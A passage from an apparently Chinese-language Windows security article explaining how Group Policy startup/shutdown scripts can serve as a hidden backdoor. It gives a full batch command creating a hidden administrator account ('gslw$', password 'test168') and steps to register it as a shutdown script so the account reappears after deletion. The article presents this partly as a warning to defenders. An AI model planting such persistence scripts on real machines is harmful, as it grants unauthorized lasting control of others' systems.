4、深藏在组策略中的“后门”

　　往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩，也为大家所熟知。其实，在最策略中也可以实现该功能，不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性，常为大家所忽略，也更危险。

　　比如一个本地用户，临时获得了某台机器的操作权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本，最简单的比如创建一个管理员用户，他可以这样做：

　　(1).创建脚本

　　创建一个批处理文件add.bat，add.bat的内容是：@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit (创建一个用户名为gslw$密码为test168的管理员用户)。

　　(2).后门利用

　　在“运行”对话框中输入gpedit.msc，定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”，在其中添加add.bat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户，就是他看见并且删除了该用户，当系统关机或者重启是又会创建该用户。所以说，如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。(图7)

图7 组策略脚本设置

　　其实，对于组策略中的这个“后门”还有很多利用法。有些远程攻击者通过它来运行脚本或者程序，嗅探管理员密码等等。当他们获取了管理员的密码后，就不用在系统中创建帐户了，直接利用管理员帐户远程登录系统。因此它也是“双刃剑”，希望大家重视这个地方。当你被攻击而莫名其妙时，说不定攻击者就是通过它实现的。